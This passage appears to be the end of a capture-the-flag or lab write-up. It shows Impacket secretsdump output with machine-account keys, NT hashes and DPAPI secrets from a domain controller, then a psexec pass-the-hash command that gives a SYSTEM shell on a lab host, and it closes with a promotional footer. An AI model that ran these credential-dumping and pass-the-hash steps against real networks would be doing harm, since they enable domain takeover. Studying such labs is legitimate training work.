DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
CONTROLLER\CONTROLLER-1$:aes256-cts-hmac-sha1-96:f9b7d8ffee34301b4f8a0afda2c623816ea6977eeddadc3db1fa5e08a8e7aeb2
CONTROLLER\CONTROLLER-1$:aes128-cts-hmac-sha1-96:a16a484e55a8a975699a57612d325598
CONTROLLER\CONTROLLER-1$:des-cbc-md5:8c70105849760b25
CONTROLLER\CONTROLLER-1$:plain_password_hex:681d71f6ae20f30016cf2ea8f15559c731bfe8540e1b013b4a578ef298eb53675acc165ea75d0b50ac05468004d8d0bff836ecd117eb533390e43fed0b4ce30b4a15ea0593cd00ca88e3e36e13dced29326d927f3322e7e7535e5f67f6084898bb28399f6a143b4096a1b3d56d5cc10cef340624246d95631847f1fa12d1d0ae1d087cbebeeac1366a488fb2888a5abb20450e12a4a61bb41da4299e2c8b656a987db38849f1662e94fedf1d387141232f1c34c33129b43e20ab86dfbdd45af70832731b3d5b7fb9926450c361338739753b14e0c3b65e3ce64db8d26c2ab5ecf1f1e64f623e9b8dc595d3759b989632
CONTROLLER\CONTROLLER-1$:aad3b435b51404eeaad3b435b51404ee:dac2964ed5aeb9543cec20bddd0d66bf:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x83f9488e2aeef29b354be313f76363f8e5770bf2
dpapi_userkey:0x7c5d37fa459e37a1e9a3180c44092d5143490810
[*] NL$KM 
 0000   68 09 BC 65 4B C4 62 83  B2 D1 FA B7 79 5B 82 86   h..eK.b.....y[..
 0010   41 7E 09 44 96 24 E4 86  A4 23 66 F2 94 C9 F1 5D   A~.D.$...#f....]
 0020   2D 1A 9D 14 B4 B3 35 54  27 B3 CB B1 E0 9A 26 82   -.....5T’.....&.
 0030   EB 40 75 72 EF 11 38 05  9C 50 E2 32 86 B1 FD CB   .@ur..8..P.2....
NL$KM:6809bc654bc46283b2d1fab7795b8286417e09449624e486a42366f294c9f15d2d1a9d14b4b3355427b3cbb1e09a2682eb407572ef1138059c50e23286b1fdcb
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Cannot create “sessionresume_iLKQMPZa” resume session file: [Errno 13] Permission denied: ‘sessionresume_iLKQMPZa’
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
</details>
┌──(kali㉿kali)-[~]
└─$ psexec.py Administrator@10.48.184.32 -hashes aad3b435b51404eeaad3b435b51404ee:2777b7fec870e04dda00cd7260f7bee6
Impacket v0.14.0.dev0+20251107.4500.2f1d6eb2 - Copyright Fortra, LLC and its affiliated companies 
[*] Requesting shares on 10.48.184.32.....
[*] Found writable share ADMIN$
[*] Uploading file rgFIeoMh.exe
[*] Opening SVCManager on 10.48.184.32.....
[*] Creating service HsUm on 10.48.184.32.....
[*] Starting service HsUm.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> 

Hope you guys like it happy hacking!

Cybersecurity Auditing Tools

Enhance your security posture with ZIntel. Comprehensive auditing and threat intelligence APIs designed for modern infrastructure.